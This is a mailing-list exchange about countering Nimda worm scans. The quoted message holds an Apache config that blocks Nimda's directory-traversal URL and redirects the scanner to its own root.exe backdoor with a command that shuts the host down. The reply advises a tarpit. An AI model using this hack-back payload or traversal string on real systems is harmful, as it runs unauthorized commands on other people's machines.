[NTLUG:Discuss] Possible new nimda counter-attack.

[Chris Cox]

I think the LBrea tarpit things is a better idea...
I don't recommend redirecting to a site, unless you want to risk
some trouble for yourself.  Of course, if I redirected them somewhere,
I'd want them to see:
http://msbc.simplenet.com/quotes/

But since it's likely that only the computer will go to the address, it
wouldn't have the desired effect.

Richard Geoffrion wrote:

> While researching possible means to counter attack this dang microsoft.nimda
> virus, I discovered that..
> 
> a)  I can't use high ascii characters in linux directory names.
> b)  I can't create a wildcard directory on the reiserfs that would accept
> input from any md command
>     (ie:  mkdir * would then be accessible by cd wombat  or cd nonimda -OR-
> in this case "cd scripts")
> 
> But I DID discover something..... EXTERNAL REDIRECTS!  I tested this and
> redirected the URL
> http://rain.lewisville.tx.us/scripts/..%5c../winnt/system32/cmd.exe straight
> to yahoo.com!  Now of course I don't want to go around sending people to
> other websites......hm....just had a thought!  Maybe I DO want to redirect
> them somewhere!?!?  Maybe I could redirect them to the BIGGEST webpage that
> Microsoft has published....anybody know of a good one?
> 
> But I digress....
> 
> Here is what I added to my httpd.conf file.
> 
> # External Redirect of a nimda scan
> <Location /scripts/*/winnt/system32/*>
>     Deny from all
>     ErrorDocument 403
> http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
> owsEx+5", "r"
> #    ErrorDocument 403 http://www.yahoo.com
> </Location>
> 
> Since I know that this redirect in and of itself works, my question has to
> do with the syntax of the http string.  Can anyone tell me if this is
> correct or help me with the syntax?  I only want to do my part!
> 
> 
> 
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
> 
>